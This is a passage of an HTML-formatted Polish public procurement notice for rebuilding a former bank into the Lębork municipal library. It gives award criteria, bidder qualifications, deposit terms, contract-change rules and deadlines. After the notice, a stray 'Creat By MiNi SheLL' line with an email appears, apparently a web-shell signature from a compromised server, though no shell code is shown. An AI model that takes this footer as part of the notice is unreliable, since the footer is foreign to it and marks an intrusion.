Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa.<br/>Spełnienie warunku będzie oceniane na podstawie wykazania przez Wykonawcę wykonania nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednej inwestycji budowlanej polegającej na przebudowie lub rozbudowie budynku użyteczności publicznej (zgodnie z definicją Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie t.j. z 2022 r. poz. 1225 §3 pkt. 6) o powierzchni części przebudowy lub rozbudowy co najmniej 400 m2 wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/><br/>Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń, określonych w Dziale VIII pkt 4.1 SWZ, zgodnie z formułą ,,spełnia – nie spełnia”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia)/Podmiotu udostępniającego<br/>zasoby dotyczące spełnienia warunku udziału w postępowaniu – według Załącznika nr 2 do SWZ .<br/>2. Oświadczenie Wykonawcy/ Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia /Podmiotu udostępniającego<br/>zasoby w zakresie podstaw wykluczenia z postępowania – Załącznik nr 5 do SWZ.<br/>3. Ewentualne pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy. Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, lub kopii poświadczonej elektronicznie przez notariusza kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>4. Zobowiązanie podmiotu trzeciego (załącznik obowiązkowy w przypadku, gdy Wykonawca powołuje się na zasoby innych<br/>podmiotów w celu wykazania spełniania warunków udziału w postępowaniu) – zgodnie z Załącznikiem nr 6 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasadami tych podmiotów.<br/>5. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania zamawiający może zażądać od wykonawcy odpisu lub informacji z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa wyżej, jeśli zamawiający może je uzyskać za pomocą bezpłatnych ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w dokument.<br/>6. Oświadczenie Wykonawcy / Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia / Podwykonawcy /<br/>Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 UOBN –<br/>Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących:<br/>1.1. zdolności technicznej lub zawodowej Zamawiający żąda złożenia:<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty (wykaz robót zgodnie z Załącznikiem nr 3 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości 20 000,00 zł (słownie złotych: dwadzieścia tysięcy 00/100).<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, tj. do dnia 25.12.2025 r.<br/>2.	Wadium może być wnoszone w jednej lub kilku formach określonych w art. 97 ust. 7 ustawy Prawo zamówień publicznych.<br/>2.1.	Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Polska Kasa Opieki SA 21 1240 1268 1111 0010 8729 0508 z odpowiednim dopiskiem:<br/>„Bank Kultury – przebudowa dawnego banku na siedzibę Miejskiej Biblioteki Publicznej <br/>w Lęborku (etap II)”<br/>2.2.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>2.3.	W razie wniesienia wadium w pieniądzu, wpłata na konto powinna być wniesiona z takim wyprzedzeniem, aby środki pieniężne znalazły się na rachunku bankowym Zamawiającego najpóźniej w dniu 26.11.2025 r. do godziny 8:45, pod rygorem uznania, że warunek wpłaty wadium nie został spełniony.<br/>3.	Wadium wniesione w formie poręczenia lub gwarancji Wykonawca przekazuje Zamawiającemu w oryginale gwarancji lub poręczenia, w postaci elektronicznej.<br/>4.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>4.1.	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 128 ust. 1 ustawy Prawo zamówień publicznych (zwana dalej Pzp), z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejsze.<br/>4.2.	Wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>4.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana.<br/>5.	Zamawiający zwróci wadium:<br/>5.1.	Wszystkim Wykonawcom niezwłocznie, nie później jednak niż 7 dni od dnia wystąpienia jednej z okoliczności:<br/>a) upływu terminu związania ofertą;<br/>b) zawarcia umowy w sprawie zamówienia publicznego;<br/>c) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku:<br/>1.1. wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Pełnomocnictwo winno zostać<br/>złożone w formie opisanej w pkt. 2.5. Działu VII SWZ.<br/>1.2. w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania<br/>każdy z Wykonawców złoży osobno dokumenty i oświadczenie wymienione w pkt. 2.2., 2.3., 2.4., 2.7. i 2.8. Działu VII SWZ.<br/>Oświadczenia te mają potwierdzić brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>1.3. w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>Zamawiający żąda od wykonawcy wspólnie ubiegającego się o udzielenie zamówienia dokumentu, o którym mowa w pkt.<br/>2.7. Działu VII SWZ.<br/>1.4. wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>1.5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. Wówczas wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy.<br/>1.6. Zamawiający nie narzuca osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia kluczowych etapów realizacji zadania.<br/>1.7. 1.8. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zam <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2) lit. b i c i 4) oraz ust. 2 ustawy prawo zamówień publicznych,<br/>przewiduje się możliwość dokonania istotnych postanowień umowy w stosunku do treści złożonej oferty na podstawie której<br/>Ogłoszenie nr 2025/BZP 00277879/01 z dnia 2025-06-13<br/>2025-06-13 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>dokonano wyboru wykonawcy, dotyczących:<br/>1.1. Terminu zakończenia robót, o czas trwania przeszkody w następujących przypadkach określonych w SWZ i Projekcie<br/>Umowy:<br/>1.2. Zmiany wysokości wynagrodzenia związane z:<br/>1.2.1. koniecznością zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych<br/>rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji, a wynikających ze stwierdzonych wad tej<br/>dokumentacji lub zmiany stanu prawnego, w oparciu o który je przygotowano, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy,<br/>1.2.2. wystąpieniem warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji, w<br/>szczególności napotkania w trakcie robót niezinwentaryzowanych lub błędnie zinwentaryzowanych instalacji,<br/>1.2.3. koniecznością zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych<br/>ze względu na zmiany obowiązującego prawa,<br/>1.2.4. wystąpieniem siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami<br/>jednak nie stanowi to zobowiązania do wyrażenia zgody na takie zmiany.<br/>Strona wnioskująca o zmianę umowy, w okolicznościach, o których mowa w pkt. 1.1.-1.2. przedkłada drugiej stronie<br/>pisemne uzasadnienie konieczności wprowadzenia zmian do umowy, w razie potrzeby z załączeniem odpowiednich<br/>dokumentów uzasadniających konieczność zmiany. Zmiany zawartej umowy będą wymagały aneksu w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-26 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umlebork.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-26 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com